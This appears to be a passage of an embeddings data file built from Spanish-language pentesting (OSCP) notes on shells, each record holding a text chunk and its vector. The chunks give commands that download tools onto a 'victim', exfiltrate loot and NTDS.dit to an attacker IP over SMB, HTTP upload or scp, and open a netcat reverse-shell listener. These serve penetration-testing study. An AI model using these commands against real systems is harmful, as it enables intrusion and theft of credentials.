-0.00612, 0.0263, -0.02456, -0.06691, 0.03752, -0.01839, -0.02053, 0.00097, -0.03404, -0.02644, -0.01822, 0.01937, -0.03616, -0.07023, -0.047, -0.07964, -0.0401, 0.03127, 0.0221, -0.02035, -0.04479, -0.02662, -0.01945, -0.03553, -0.03648, 0.04449]} +{"tipo": "metodologia", "herramienta": "Transferencia de ficheros", "perfil": "PENTESTERS", "tema": "shells", "fichero": "conocimiento/03 - Shells/Transferencia de ficheros.md", "texto": "## Descargar EN la víctima Linux\n```bash\nwget http://TU_IP/f -O f ; curl -o f http://TU_IP/f\nphp -r '$f=file_get_contents(\"http://TU_IP/f\");file_put_contents(\"f\",$f);'\npython3 -c \"import urllib.request;urllib.request.urlretrieve('http://TU_IP/f','f')\"\ncat < /dev/tcp/TU_IP/7788 > f # con nc -lvnp 7788 < f en Kali\n```", "v": [-0.03847, -0.09821, -0.11617, -0.00745, 0.15925, -0.24019, -0.00671, 0.02338, -0.02062, 0.12495, -0.08125, -0.03495, -0.01323, -0.0157, -0.09919, -0.04677, -0.10762, -0.15254, 0.11319, -0.15206, -0.04052, 0.15702, -0.1988, -0.10525, -0.09871, 0.12958, -0.07512, 0.00205, -0.06401, -0.16435, 0.07774, -0.12365, -0.08677, 0.02302, -0.10508, -0.02305, 0.05881, 0.00761, -0.0496, 0.18807, -0.02343, 0.01516, -0.13278, 0.10145, -0.0189, -0.05618, -0.00593, -0.02558, 0.08935, -0.07524, 0.0591, -0.13962, 0.06356, -0.0227, -0.06178, 0.03283, 0.07713, -0.08154, -0.01901, 0.02067, -0.03666, 0.06007, -0.10416, -0.09107, 0.06517, -0.05092, -0.00566, 0.01104, -0.08479, -0.05372, -0.00641, -0.0271, -0.09367, -0.02469, 0.06255, -0.06264, 0.01715, -0.12604, 0.04976, 0.01887, -0.09201, -0.01195, -0.09958, 0.0202, -0.0446, -0.10126, 0.12142, -0.08198, 0.00492, -0.02743, 0.04385, 0.07522, -0.06985, 0.02487, 0.08341, -0.03599, 0.03318, 0.07433, 0.0157, -0.01077, 0.01308, 0.03238, -0.04015, 0.00471, 0.09114, -0.04266, 0.09476, 0.0613, -0.00987, 0.0006, 0.01103, 0.00631, 0.04317, -0.11557, -0.06363, -0.05216, -0.06266, -0.00826, 0.04049, -0.02417, -0.03116, -0.06828, 0.0005, -0.02687, -0.00189, -0.00355, 0.00054, 0.10224, -0.02251, -0.02964, 0.05844, -0.05834, -0.02815, -0.03102, 0.08475, 0.05053, 0.01583, -0.02677, 0.00354, 0.06851, 0.02489, -0.02164, 0.00295, 0.0428, 0.09753, -0.06074, 0.00734, -0.09426, -0.01532, 0.0096, 0.03857, 0.02237, 0.02056, -0.01076, -0.06012, 0.01646, 0.01028, -0.01443, 0.03769, -0.02194, 0.04015, 0.09483, 0.04536, 0.02567, -0.04565, -0.03876, -0.09223, -0.01694, 0.07724, -0.03936, -0.03287, 0.04323, -0.07505, -0.01773, -0.02846, -0.10369, 0.05644, -0.03685, -0.00211, -0.01415, 0.00546, -0.02709, 0.01871, 0.06046, 0.01776, -0.01521, 0.00216, 0.01672, -0.02001, 0.02998, 0.0683, 0.03511, -0.03781, 0.0268, 0.02697, -0.01624, -0.07584, -0.04096, -0.0043, -0.0518, -0.09231, 0.00601, 0.02638, -0.03783, 0.03073, -0.02517, -0.02284, 0.01274, -0.04472, -0.01844, 0.03079, -0.00183, -0.00364, -0.09384, -0.06743, 0.02106, 0.01991, 0.07182, 0.01053, 0.02661, -0.01574, 0.06794, 0.06159, -0.01641, -0.0333, 0.00447, 0.00726, 0.01224, 0.02115, -0.00891, -0.01621, 0.06404, -0.01786, -0.06739, 0.06605, -0.03605, -0.03057, 0.02549, -0.06009, -0.06779, -0.02068, 0.03541, -0.02247, -0.04688, -0.01297, -0.0612, -0.07241, 0.02021, -0.00231, -0.03543, -0.03873, -0.03379, -0.03606, -0.06143, -0.00181, 0.01035]} +{"tipo": "metodologia", "herramienta": "Transferencia de ficheros", "perfil": "PENTESTERS", "tema": "shells", "fichero": "conocimiento/03 - Shells/Transferencia de ficheros.md", "texto": "## Exfiltrar de la víctima → Kali\n```cmd\ncopy C:\\Windows\\NTDS\\ntds.dit \\\\TU_IP\\SERVER\\ :: SMB (cifra, cruza firewalls) → secretsdump\n(New-Object Net.WebClient).UploadFile('http://TU_IP/up.php','loot.zip')\n```\n```bash\nscp loot.tar user@TU_IP:/tmp/ # si hay SSH\n```", "v": [-0.01969, -0.16002, -0.09467, -0.09245, 0.05017, -0.2927, -0.12767, -0.01706, 0.06976, 0.21968, -0.01505, -0.06614, 0.09178, -0.07468, -0.15638, -0.00221, -0.07296, -0.13411, 0.12543, -0.0382, 0.05595, 0.09722, -0.07833, -0.06903, -0.00496, 0.09189, -0.0899, 0.06585, -0.07347, -0.06039, -0.06845, -0.0988, -0.08709, 0.08309, -0.03272, -0.08641, 0.03232, 0.00721, 0.00997, 0.15811, 0.08018, 0.10957, -0.12323, 0.06907, 0.12207, -0.0841, 0.02517, -0.07758, 0.11802, -0.1029, -0.01679, -0.06082, -0.13276, -0.10396, -0.0636, -0.01886, 0.146, -0.02312, 0.02232, 0.01276, -0.06317, 0.12563, -0.07205, -0.0494, 0.03561, -0.1251, -0.01967, -0.01908, -0.09414, 0.0648, -0.06569, 0.02614, 0.00138, -0.04804, 0.0724, -0.08506, -0.01812, -0.05958, 0.0894, 0.04763, -0.0676, -0.02955, -0.01786, -0.02383, -0.07731, -0.11334, 0.04656, -0.08182, 0.00308, -0.07316, 0.11547, 0.05501, -0.03021, 0.08142, 0.06124, -0.11389, 0.05727, 0.0287, 0.00743, 0.02392, -0.00745, 0.03337, -0.12713, 0.06694, 0.06471, 0.04782, 0.02085, 0.06557, 0.01583, -0.04102, 0.08803, 0.0553, 0.08067, -0.06125, -0.01108, -0.05565, -0.02695, -0.00392, 0.06481, 0.01093, -0.02642, -0.05639, -0.04042, -0.01116, -0.0579, -0.03726, -0.0084, 0.05993, -0.04603, -0.05942, -0.01335, -0.02505, 0.02586, 0.01297, 0.01504, -0.03813, -0.04421, -0.05143, -0.02916, -0.00131, 0.06738, -0.03101, -0.03998, 0.06255, 0.04705, -0.02443, 0.01914, -0.07354, -0.03859, -0.04583, 0.13487, 0.00405, -0.02882, -0.00275, -0.00383, 0.04671, 0.01492, -0.02161, -0.03262, 0.01518, 0.04756, 0.03055, 0.04023, 0.03806, -0.0035, 0.04077, -0.03092, 0.02595, 0.00014, -0.07285, 0.00844, 0.01789, -0.03594, -0.05821, -0.0167, -0.10821, 0.08392, -0.03806, -0.01482, -0.03258, 0.01628, -0.02869, 0.04038, 0.05984, 0.00718, -0.04175, 0.02823, 0.00227, -0.03929, 0.00165, 0.03004, 0.00492, 0.00318, 0.00852, 0.01572, -0.0196, -0.02196, -0.04387, 0.04873, 0.01013, -0.08669, 0.01023, -0.01171, -0.0559, 0.04249, -0.01798, -0.00327, -0.00493, -0.0388, 0.02556, 0.06849, -0.00632, 0.02643, -0.06743, -0.01521, -0.02622, 0.03011, 0.03804, 0.01852, -0.01434, -0.07371, 0.06898, 0.02101, 0.01011, -0.0203, 0.03534, -0.01956, 0.00696, 0.04363, -0.00719, -0.03371, 0.01185, -0.0054, -0.03552, 0.0548, -0.03561, -0.05074, 0.00411, -0.03722, -0.02669, -0.04908, 0.01153, -0.00112, -0.05501, -0.01819, -0.04811, -0.00389, 0.01046, 0.04478, -0.01139, -0.00591, -0.04854, 0.00151, -0.0451, -0.04006, 0.02508]} +{"tipo": "metodologia", "herramienta": "Transferencia de ficheros", "perfil": "PENTESTERS", "tema": "shells", "fichero": "conocimiento/03 - Shells/Transferencia de ficheros.md", "texto": "## Sin red: copy-paste por base64\n```bash\nbase64 -w0 f.bin # en origen, copias el string\necho \"BASE64...\" | base64 -d > f.bin # en destino, pegas", "v": [0.14841, -0.06438, -0.11552, -0.00594, -0.02966, -0.19886, -0.03237, -0.13846, -0.01672, -0.05692, -0.01487, 0.03051, -0.07799, -0.01641, 0.0215, -0.049, -0.05516, 0.00068, -0.11761, -0.12196, -0.03, -0.04284, -0.01621, -0.04415, 0.00943, 0.06277, -0.07902, -0.1236, -0.09113, 0.01978, 0.0946, -0.02543, -0.03855, 0.01598, -0.11443, -0.04379, -0.10983, 0.00708, -0.05958, 0.07266, 0.00723, 0.08166, -0.19811, 0.25656, -0.06385, -0.1139, 0.03672, 0.08901, 0.11234, -0.09636, 0.01084, -0.13983, -0.15064, -0.04292, -0.0594, -0.18848, 0.10878, -0.03596, -0.01532, 0.06485, -0.02405, 0.01086, 0.08895, -0.00596, 0.02153, -0.00811, 0.08931, 0.00011, -0.05826, 0.02541, -0.08989, 0.17232, -0.13692, 0.00202, 0.07052, 0.01199, 0.09889, -0.11335, -0.01095, 0.06807, -0.07717, 0.02026, -0.0251, -0.02282, 0.02269, -0.02646, 0.06161, -0.03655, -0.00873, -0.05216, 0.14174, -0.01378, 0.00894, 0.02773, -0.01252, -0.03747, -0.01065, 0.01266, -0.03572, 0.0176, -0.04836, -0.07576, 0.01362, -0.02284, 0.08471, 0.00282, 0.09583, -0.04757, -0.05166, 0.0413, -0.04164, 0.05648, 0.03688, 0.02561, 0.03533, -0.08884, -0.0455, 0.08536, 0.06827, -0.03504, -0.00561, 0.01301, -0.00843, -0.01637, 0.05343, 0.00285, -0.03464, 0.01044, -0.03098, -0.04062, -0.00519, 0.0107, 0.01142, 0.03308, -0.03954, 0.13402, 0.03505, -0.07449, -0.02862, -0.09075, 0.04866, 0.04922, -0.06633, -0.01064, 0.09731, 0.11339, 0.11394, -0.05265, -0.10601, -0.011, 0.03473, 0.00956, 0.01884, -0.03573, -0.02085, 0.01963, 0.04246, 0.00215, -0.02161, -0.02431, -0.00395, 0.05432, -0.01626, 0.04259, -0.05728, -0.00905, 0.01891, -0.08411, -0.05246, 0.0002, -0.01188, 0.09652, -0.01337, -0.04002, -0.05548, -0.06734, -0.06252, -0.02069, 0.00437, -0.0031, 0.02405, -0.0277, 0.08426, 0.01542, 0.03716, -0.04881, -0.02403, 0.02008, -0.01089, -0.00984, 0.07153, -0.05398, -0.06105, -0.00701, -0.0713, 0.02314, -0.01569, -0.00301, 0.01249, -0.06614, -0.03632, 0.04624, -0.0435, -0.00091, 0.00129, -0.02356, 0.04147, -0.00218, -0.09342, 0.09493, -0.04173, -0.00657, -0.03645, 0.01761, -0.04403, 0.00465, 0.0464, -0.02789, 0.01905, -0.05494, 0.05579, 0.02762, 0.00898, -0.01434, -0.0154, 0.07116, 0.02396, 0.01296, 0.04831, -0.02452, -0.08385, 0.0147, -0.06481, 0.01661, -0.00717, -0.05756, -0.02526, 0.06043, -0.02706, -0.07253, 0.04242, 0.00828, -0.06399, -0.04689, 0.01282, -0.04939, -0.06595, 0.05555, 0.01334, -0.03338, -0.00721, 0.04757, 0.06739, -0.05011, -0.02776, 0.00678]} +{"tipo": "metodologia", "herramienta": "Transferencia de ficheros", "perfil": "PENTESTERS", "tema": "shells", "fichero": "conocimiento/03 - Shells/Transferencia de ficheros.md", "texto": "# Windows: certutil -encode f.bin b64.txt / certutil -decode b64.txt f.bin\n```\nÚtil cuando solo tienes una shell de texto (Estabilizar shell TTY) o vía RDP `/clipboard`.", "v": [-0.05731, -0.1264, -0.14983, 0.04149, 0.19344, -0.15629, -0.12274, -0.03745, 0.1663, 0.13684, -0.12177, -0.03479, -0.00072, -0.00307, 0.04529, -0.09509, -0.05765, -0.14509, 0.08053, -0.15322, 0.08521, -0.09302, -0.02043, -0.03054, 0.08478, 0.08206, -0.13462, 0.03681, -0.12708, -0.00701, 0.13876, -0.08598, 0.04701, -0.02768, -0.08646, 0.13457, 0.02332, 0.07185, -0.12555, 0.1622, -0.01769, 0.03217, -0.082, 0.18754, 0.03339, -0.08035, -0.02695, 0.04733, 0.05054, -0.05215, -0.01336, -0.05152, -0.05826, -0.00515, 0.04284, -0.04561, 0.16411, -0.00683, 0.03055, 0.0145, 0.01535, 0.02839, 0.00456, -0.01672, -0.02024, 0.00739, 0.12398, 0.02565, -0.12337, 0.02877, 0.00779, 0.09128, -0.02361, -0.02697, 0.02934, 0.00372, -0.06932, -0.14213, 0.14504, 0.11999, -0.01739, -0.03013, -0.04488, -0.03142, -0.01594, -0.06765, 0.04719, -0.06055, 0.02414, -0.07516, 0.10817, -0.09834, -0.072, 0.07306, 0.04234, -0.08671, 0.03296, -0.02047, -0.04573, 0.04455, -0.05685, -0.04195, -0.0856, 0.02018, 0.06941, -0.00968, 0.03691, -0.00083, 0.01972, 0.0513, 0.05887, 0.01694, -0.0016, -0.00765, 0.00651, -0.08189, -0.04591, -0.04134, -0.00709, -0.05815, -0.06736, -0.03773, -0.11561, 0.05952, 0.02004, 0.00896, -0.05927, 0.05739, -0.02566, -0.01512, -0.06208, 0.01445, -0.07694, -0.03723, -0.09306, 0.08584, 0.0506, 0.02061, -0.0321, -0.00449, 0.03666, 0.063, -0.00642, 0.09499, 0.07194, 0.09512, -0.01088, -0.0359, -0.06838, 0.0382, 0.07006, 0.07398, -0.0214, 0.00389, 0.01877, -0.03315, -0.00665, 0.02733, -0.04223, -0.00821, -0.0002, 0.03216, -0.06637, 0.02116, -0.04331, -0.02164, -0.01459, -0.02316, 0.0114, -0.0681, 0.03315, 0.08214, 0.08263, -0.07615, 0.00485, -0.06398, -0.00218, -0.03712, -0.03768, -0.01659, -0.01812, -0.01359, 0.04998, -0.03357, -0.00225, -0.00166, 0.03741, 0.01832, -0.0165, 0.00072, 0.03001, -0.01004, -0.06444, -0.00881, -0.02023, 0.01345, -0.07691, -0.04369, 0.00028, -0.06647, -0.01435, -0.00099, 0.03208, -0.04896, 0.0403, -0.03187, -0.04204, 0.06361, -0.01437, 0.00166, 0.03544, 0.04412, -0.02292, 0.04714, -0.05944, -0.02043, -0.02726, 0.04667, 0.01644, -0.02611, 0.0189, 0.01153, 0.07659, -0.00147, -0.0337, -0.00063, 0.02752, 0.01685, 0.0173, 0.02455, -0.00943, 0.06858, -0.00591, 0.00812, 0.05424, -0.01358, -0.05127, 0.00741, -0.00637, -0.0899, 0.08087, 0.00093, -0.07543, -0.06176, -0.0345, -0.04767, -0.07345, 0.0064, 0.01053, -0.04188, -0.0696, -0.04563, 0.00973, -0.05159, 0.01449, -0.01742]} +{"tipo": "metodologia", "herramienta": "Transferencia de ficheros", "perfil": "PENTESTERS", "tema": "shells", "fichero": "conocimiento/03 - Shells/Transferencia de ficheros.md", "texto": "## Cifrado (canal vigilado)\n```bash\nopenssl enc -base64 -in f -out f.b64 # ofuscar\nopenssl s_server -quiet -accept 7788 -cert c.pem -key k.pem < f # transferencia TLS\n```\n\nRelacionado: Egress filtering · Tunneling · Herramientas (índice) · OSCP MOC", "v": [-0.02257, -0.17445, -0.1067, -0.09505, -0.02363, -0.28537, -0.06201, -0.01, -0.05154, 0.02367, -0.14171, -0.00162, -0.01851, -0.05452, 0.05582, 0.05361, -0.00902, -0.06749, -0.02241, -0.04781, -0.09629, -0.0039, -0.06698, -0.093, 0.01719, 0.1495, -0.15784, -0.02457, -0.04986, -0.11432, 0.11354, -0.0447, -0.00284, 0.11523, -0.08336, -0.00987, -0.16856, 0.04502, -0.05472, 0.09808, -0.0577, 0.06362, -0.12901, 0.14354, 0.09129, -0.18575, 0.01356, 0.05097, 0.12852, -0.07778, -0.07525, -0.2097, -0.197, -0.04166, -0.01394, 0.00315, 0.03633, 0.01335, 0.04142, 0.01742, -0.02652, 0.02463, 0.0952, -0.00857, 0.08203, -0.1177, 0.04996, 0.01871, -0.05059, 0.04114, -0.0323, 0.08947, -0.09537, 0.04704, 0.12217, -0.01466, 0.06025, -0.08822, 0.08853, 0.05857, -0.0893, -0.03753, 0.05623, 0.00643, -0.00626, -0.03687, 0.01255, -0.0426, -0.00877, -0.00378, 0.06784, 0.0591, -0.03492, 0.03661, 0.08191, -0.05578, -0.08526, 0.0273, 0.01033, -0.10977, 0.04654, 0.03098, -0.06141, 0.00077, 0.06271, 0.02316, 0.0953, -0.05853, -0.03476, 0.00626, 0.06802, 0.0802, 0.1031, -0.06489, -0.00263, -0.00029, -0.04053, 0.01085, 0.09508, 0.00134, 0.0008, -0.06599, -0.03401, 0.00829, 0.01559, 0.00404, -0.00103, 0.02928, -0.01365, -0.03057, -0.05204, -0.01285, -0.03922, 0.00621, -0.02429, 0.08322, 0.03994, -0.04239, -0.02603, -0.05074, 0.00826, 0.03405, -0.01309, 0.03618, 0.13205, 0.04928, 0.03059, -0.08802, -0.09784, -0.00107, 0.00932, 0.04583, -0.00107, -0.02924, 0.01797, -0.0214, -0.01767, -0.00454, -0.06265, 0.05942, 0.06657, 0.05688, 0.02081, 0.05934, -0.06837, 0.01425, -0.00104, -0.07506, -0.04235, -0.06764, 0.03644, 0.05926, -0.06122, -0.02638, -0.03017, -0.06393, -0.01498, -0.05187, -0.0188, -0.02882, 0.01061, -0.03057, 0.0723, 0.05329, 0.02182, -0.04256, -0.03835, -0.01004, 0.01103, 0.00178, 0.06284, -0.04673, -0.08582, 0.00191, 0.00171, -0.03036, -0.0001, -0.06234, -0.05042, -0.07076, -0.02174, -0.01721, 0.03616, -0.01508, -0.00535, -0.0062, 0.03059, -0.00202, -0.02423, 0.00168, -0.00425, -0.04126, -0.04326, -0.04424, -0.06233, 0.02336, 0.01467, 0.03049, -0.01478, -0.02764, -0.00884, 0.01764, 0.001, -0.01471, -0.03688, 0.06509, -0.02503, -0.03487, 0.0563, -0.04661, -0.02403, 0.00679, -0.05933, -0.01258, 0.07987, -0.0441, -0.08382, 0.01265, -0.01775, -0.04075, 0.04914, -0.05411, -0.03585, -0.01304, -0.0143, -0.03848, -0.021, 0.03317, -0.01924, 0.0081, -0.02581, -0.03545, -0.04455, -0.07746, 0.02092, 0.00371]} +{"tipo": "metodologia", "herramienta": "Puesto de mando Kali", "perfil": "PENTESTERS", "tema": "shells", "fichero": "conocimiento/03 - Shells/Puesto de mando Kali.md", "texto": "# Puesto de mando Kali\n\n> **No tienes una GUI central.** Cada herramienta es independiente y habla por red con la víctima.\n> Tu Kali = un puesto de mando con varios terminales abiertos a la vez.", "v": [-0.12523, 0.03464, -0.16632, 0.02699, -0.0918, -0.09323, -0.06459, 0.03364, -0.03533, -0.06017, -0.06438, -0.06983, 0.02025, -0.00102, 0.09116, 0.10821, 0.0284, -0.10058, 0.14591, -0.02138, -0.0548, -0.02971, -0.0393, -0.02574, 0.04582, 0.0628, 0.10043, -0.16313, -0.07888, 0.02758, 0.0367, -0.0964, -0.03537, -0.15956, -0.05728, -0.11233, -0.06602, 0.03841, -0.00488, 0.06655, 0.01244, 0.07985, -0.0896, -0.02548, 0.10363, -0.05434, 0.03722, -0.01461, 0.13314, 0.14521, 0.02633, -0.17476, -0.10262, -0.10593, 0.07356, -0.1343, 0.25759, 0.03375, 0.01011, -0.16548, 0.0188, 0.01364, 0.02519, 0.06185, 0.0264, -0.06534, 0.06087, 0.01413, -0.06499, 0.05968, -0.01468, 0.03575, -0.05664, 0.03715, 0.00437, -0.07995, -0.07563, -0.02322, 0.11991, 0.05899, -0.03187, -0.07935, -0.06911, -0.01107, -0.06539, -0.09904, 0.09867, -0.07541, -0.10116, -0.04244, 0.10987, -0.01461, -0.02044, 0.08667, 0.10643, 0.00127, 0.02746, 0.00602, 0.01014, -0.0062, 0.20638, -0.00328, -0.06379, 0.01104, 0.04142, 0.01415, 0.03348, -0.02234, 0.06102, 0.03604, -0.0107, 0.0029, 0.09594, 0.0059, -0.05548, 0.00213, 0.01107, 0.00706, -0.00072, -0.07756, 0.06304, 0.02578, 0.03929, -0.02985, -0.01045, -0.06234, -0.12507, 0.00798, 0.09632, 0.02544, 0.05335, -0.04151, 0.06175, -0.03222, 0.02193, 0.04284, 0.04345, -0.05443, -0.01119, -0.03182, -0.02385, 0.02136, 0.00602, -0.09996, 0.08113, 0.00541, 0.02621, -0.01067, -0.02695, 0.08571, 0.0075, -0.00641, 0.02117, 0.0463, -0.06108, 0.02461, -0.04319, -0.00681, -0.06793, 0.06783, -0.0267, -0.0346, -0.0352, 0.03752, 0.05697, -0.02698, -0.00257, 0.01844, 0.05824, -0.06076, -0.00408, -0.00512, -0.00864, 0.02047, -0.05718, -0.13661, -0.00288, -0.07619, 0.00404, -0.0837, 0.02321, 0.01284, -0.08076, -0.02838, 0.008, 0.0029, -0.01445, -0.06728, 0.02551, 0.02032, 0.00436, 0.06135, -0.00447, 0.00137, 0.07238, 0.01864, 0.00822, -0.04651, -0.06779, -0.00195, -0.08111, 0.08979, 0.02744, -0.05252, 0.02027, 0.02514, -0.06763, 0.03028, -0.0065, 0.11211, 0.02832, -0.00011, 0.02344, 0.0154, -0.04673, -0.05597, -0.00023, 0.02954, 0.0357, 0.02268, 0.00521, 0.0041, 0.06887, 0.02015, -0.02684, 0.07626, -0.01118, 0.00944, 0.03419, 0.01838, 0.01122, -0.00733, 0.00566, -0.0747, -0.02278, 0.00795, 0.04235, 0.01021, -0.06775, -0.05976, 0.00363, 0.04739, -0.01642, -0.03295, -0.02732, -0.04377, -0.02416, 0.01608, -0.00327, -0.0697, -0.02677, 0.06267, 0.04898, -0.08389, -0.02897, -0.05111]} +{"tipo": "metodologia", "herramienta": "Puesto de mando Kali", "perfil": "PENTESTERS", "tema": "shells", "fichero": "conocimiento/03 - Shells/Puesto de mando Kali.md", "texto": "## Los 4 terminales\n```\nTerminal 1 — listener de shells\n stty raw -echo; (stty size; cat) | nc -lvnp 4444\n\nTerminal 2 — HTTP para servir tus tools a la víctima\n cd tu carpeta\n python3 -m http.server 80\n\nTerminal 3 — SMB para que la víctima TE envíe ficheros\n mkdir /tmp/loot && cd /tmp/loot\n impacket-smbserver loot . -smb2support\n\nTerminal 4 — tu shell de trabajo (nxc, impacket, etc.)\n $\n```\n\n- Terminal 1 recibe la Reverse shell (estabilízala → Estabilizar shell TTY).\n- Terminales 2 y 3 = Transferencia de ficheros (subir tools / exfiltrar loot).\n- Terminal 4 = lanzas Impacket, BloodHound, etc.\n\nRelacionado: Egress filtering · OSCP MOC", "v": [0.03123, -0.21248, -0.16421, -0.18263, -0.03666, -0.15399, -0.11839, 0.10363, 0.13496, 0.20134, -0.21231, 0.01709, 0.12888, -0.02295, -0.01675, 0.01145, -0.07327, -0.16468, 0.07983, -0.08829, -0.02255, 0.0693, -0.09383, -0.0649, 0.07011, 0.17852, -0.01353, 0.04376, -0.1131, -0.02247, 0.04338, -0.10109, 0.0495, 0.05953, 0.01678, -0.07899, 0.01196, -0.08217, 0.00024, 0.20554, 0.13118, -0.00276, -0.08737, 0.06395, 0.11752, -0.17439, 0.06648, 0.00288, 0.09251, -0.00639, 0.01527, 0.00318, -0.19737, 0.00247, -0.02344, -0.01123, 0.12319, -0.05601, 0.0947, 0.04411, -0.12483, 0.00302, 0.00537, 0.01025, 0.05533, -0.02872, 0.02683, -0.006, -0.11271, 0.09052, -0.0479, 0.04488, 0.08447, -0.0344, 0.02734, -0.02944, -0.01572, -0.02762, 0.08573, 0.07477, -0.05674, -0.03242, -0.02601, -0.02888, -0.04911, -0.0659, 0.02072, -0.0079, 0.00747, 0.01481, 0.09765, 0.00688, -0.04534, 0.03297, -0.00677, -0.12354, -0.04938, -0.05556, -0.01786, -0.09083, 0.03536, 0.01259, -0.04343, 0.08333, 0.00143, -0.03595, -0.0197, -0.01725, 0.02046, -0.0065, 0.122, 0.0157, 0.13456, 0.04393, -0.02498, -0.05055, 0.02213, 0.02938, 0.05323, -0.00809, -0.01714, -0.01242, -0.01461, 0.06972, -0.01901, -0.00599, 0.03023, 0.03341, 0.0173, -0.04521, 0.00789, 0.03818, 0.001, 0.02385, -0.07826, -0.0027, 0.05009, -0.06976, -0.02816, 0.00482, -0.0353, 0.03852, -0.05898, 0.04086, 0.09859, 0.05882, 0.03076, 0.00947, -0.00722, -0.04073, 0.10799, 0.03058, -0.04476, -0.0162, 0.00291, -0.01566, 0.01439, -0.03962, -0.11416, -0.006, 0.03434, -0.02341, -0.01227, 0.04883, -0.05491, 0.0263, -0.02069, -0.00435, 0.01335, -0.04967, 0.01009, -0.06148, 0.04352, -0.05168, -0.01202, -0.10699, 0.00753, 0.00884, -0.03236, -0.00888, 0.00666, -0.02992, 0.00955, -0.02445, -0.0037, -0.05745, 0.02605, -0.0034, -0.00505, 0.04119, 0.05259, 0.02995, -0.02955, 0.02249, 0.01594, -0.01096, 0.03692, -0.08599, -0.03588, 0.03801, -0.02833, 0.03835, 0.03592, -0.0692, 0.00966, 0.00025, -0.06307, -0.02358, -0.02139, -0.01425, -0.00211, 0.01336, 0.0412, -0.00379, 0.00757, 0.00292, -0.00165, 0.08966, -0.01895, -0.00219, -0.036, 0.00937, 0.01661, -0.01966, -0.01735, 0.01804, 0.05749, -0.03233, 0.05305, -0.04662, -0.02582, 0.02757, 0.03871, -0.04194, -0.02262, -0.0169, -0.02, -0.00248, -0.00304, -0.00293, 0.0385, 0.00767, -0.01898, -0.02276, -0.02188, 0.01847, -0.03529, 0.00439, -0.01085, 0.03444, -0.05752, -0.05903, -0.0149, -0.02733, -0.05512, -0.0088]} +{"tipo": "metodologia", "herramienta": "Estabilizar shell TTY", "perfil": "PENTESTERS", "tema": "shells", "fichero": "conocimiento/03 - Shells/Estabilizar shell TTY.md", "texto": "# Estabilizar shell TTY\n\n> Una shell rota es tortura (sin Ctrl+C, sin flechas, sin `sudo`). Esto la arregla. Sigue a Reverse shell.", "v": [-0.05073, -0.19838, -0.24786, 0.02541, 0.05188, -0.08415, -0.07459, -0.03742, 0.26976, 0.10451, -0.28772, 0.05775, 0.08037, -0.07168, 0.17517, -0.05638, -0.14666, -0.01969, 0.01075, -0.0865, -0.0997, -0.16401, -0.0278, 0.00331, -0.01323, 0.00806, -0.08467, 0.09465, 0.00019, -0.13133, 0.00152, -0.03532, 0.14422, -0.06129, -0.00861, 0.05852, -0.02554, -0.11763, 0.01752, 0.13429, -0.02105, -0.00275, -0.07046, 0.09255, 0.05488, -0.04751, 0.08808, 0.01255, -0.00117, 0.0891, 0.00791, -0.02734, -0.11817, -0.08902, 0.06402, 0.00635, 0.16628, -0.01701, -0.00428, -0.03027, -0.06023, 0.059, 0.05107, 0.12875, -0.00476, 0.04379, -0.04304, -0.15161, -0.15471, 0.08008, -0.03519, 0.01983, -0.09375, -0.00301, -0.03095, -0.05386, -0.03294, -0.02142, 0.08679, 0.0572, -0.0198, -0.06421, -0.06616, 0.00196, -0.06061, -0.01449, -0.02108, -0.09518, -0.06191, -0.03293, 0.04248, -0.05046, 0.02438, 0.06955, 0.08227, -0.03419, 0.01523, 0.01304, 0.0052, -0.02581, 0.03912, -0.02834, -0.05366, 0.07409, 0.03669, -0.01779, -0.05484, -0.06709, 0.04853, 0.08171, 0.1034, 0.01648, -0.00975, 0.03199, -0.02849, 0.0269, -0.01642, -0.07716, 0.04158, -0.0923, 0.01845, -0.03912, -0.06204, 0.03834, -0.02756, 0.03874, -0.06426, 0.06277, -0.03022, -0.02517, 0.03655, 0.0189, -0.01516, -0.00904, 0.02411, 0.06278, 0.08638, -0.002, 0.01107, -0.06573, 0.01421, 0.09327, 0.00448, 0.01669, 0.08462, 0.04376, 0.05628, 0.00243, -0.05614, 0.01063, 0.06429, 0.025, 0.0432, -0.00883, 0.03054, -0.05445, -0.01477, -0.00315, 0.02705, -0.01197, 0.04876, -0.01659, -0.04956, 0.03237, -0.01223, 0.00064, -0.04061, -0.06504, 0.00694, 0.01296, 0.01132, 0.07636, 0.04461, 0.02842, -0.009, -0.06279, 0.0153, 0.00569, 0.04241, -0.02828, 0.03217, 0.06669, 0.00493, -0.06364, -0.02956, -0.00163, 0.0107, 0.07556, -0.01702, 0.02866, 0.06341, 0.01613, -0.01483, -0.06182, -0.03465, 0.0392, -0.0229, -0.05362, 0.02567, -0.02408, -0.03734, 0.03364, 0.00507, -0.0556, 0.0528, 0.01532, -0.03318, 0.0268, 0.02642, 0.01558, -0.0202, 0.01757, -0.03944, 0.04361, 0.01781, -0.01893, 0.02069, -0.01571, -0.03723, -0.00364, 0.01956, 0.06109, 0.07181, 0.0446, 0.01824, 0.03209, 0.04217, 0.03703, 0.0031, -0.00598, -0.01844, 0.00805, 0.0141, -0.00997, -0.03313, -0.00478, 0.0195, -0.01712, -0.02894, -0.00589, -0.0073, 0.05544, -0.02484, -0.01371, -0.01371, -0.03069, 0.01402, -0.00517, -0.02045, -0.05478, -0.01862, -0.01666, 0.00057, -0.11444, 0.0097, -0.01223]} +{"tipo": "metodologia", "herramienta": "Estabilizar shell TTY", "perfil": "PENTESTERS", "tema": "shells", "fichero": "conocimiento/03 - Shells/Estabilizar shell TTY.md", "texto": "# Enter, Enter\nexport TERM=xterm\nstty rows 40 columns 120\n```\n- `rows`/`cols` los sacas con **`stty size`** en TU Kali.", "v": [-0.0277, -0.09136, 0.06706, -0.07612, 0.08011, -0.16228, 0.0346, 0.09171, 0.1848, 0.09282, -0.29468, -0.15447, 0.03746, 0.01032, 0.06419, -0.01177, -0.06931, -0.12952, 0.11584, 0.11434, -0.01518, -0.06839, -0.08767, -0.05588, 0.08824, 0.0774, -0.08547, -0.00552, -0.05829, 0.04023, 0.02147, -0.09605, -0.04926, -0.13877, 0.01052, -0.09196, -0.01423, 0.03722, -0.08517, 0.08462, -0.04353, 0.0064, -0.12104, 0.07698, 0.14562, -0.07022, 0.04947, 0.04791, 0.06031, -0.097, -0.06362, 0.01769, 0.0617, 0.00852, 0.04845, -0.1327, -0.09215, 0.08794, -0.07502, 0.01608, 0.03129, -0.05325, -0.03354, -0.04729, 0.03081, 0.01277, -0.09196, -0.00768, 0.05543, 0.09369, -0.08596, -0.0504, -0.04786, -0.17398, 0.06009, -0.01912, 0.05506, -0.03058, 0.0278, 0.02688, -0.09251, -0.09462, 